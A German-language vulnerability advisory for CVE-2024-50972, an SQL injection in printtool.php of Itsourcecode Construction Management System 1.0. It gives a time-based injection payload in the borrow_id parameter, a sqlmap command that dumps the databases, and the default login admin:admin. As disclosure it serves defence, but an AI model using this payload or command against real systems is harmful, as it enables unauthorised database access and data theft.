CVE-2024-50972
Beschreibung
Eine SQL-Injection-Schwachstelle in printtool.php des Itsourcecode Construction Management System 1.0 ermöglicht es entfernten Angreifern, beliebige SQL-Befehle über den Parameter borrow_id auszuführen.
Schwachstellentyp
SQL-Injection
Anbieter des Produkts
Itsourcecode
Betroffene Produktcodebasis:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
Betroffene Komponente:
Das Itsourcecode Construction Management System v1.0 ist anfällig für SQL-Injection über den Parameter borrow_id auf der Seite printtool.php
Angriffsvektoren:
- Richten Sie die Anwendung lokal ein und melden Sie sich mit den Administrator-Anmeldedaten admin:admin an.
- Navigieren Sie in Ihrem Browser zur folgenden URL:
http://localhost/monitoring_system/printtool.php?borrow_id=5
- SQL-Payload injizieren:
Modifizieren Sie den Parameter borrow_id in der URL, um eine zeitbasierte SQL-Injection-Payload einzufügen.
http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
- Beobachten Sie die Anwendungsantwort:
Die Seite sollte merklich länger (20 Sekunden) zum Laden benötigen, wenn die Injektion erfolgreich ist, was bestätigt, dass der Parameter borrow_id anfällig für SQL-Injection ist.
- Verwenden Sie nun das SQLMap-Tool zur weiteren Ausbeutung und zum Dumpen von Datenbanken mit dem folgenden Befehl:
sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
Referenz:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection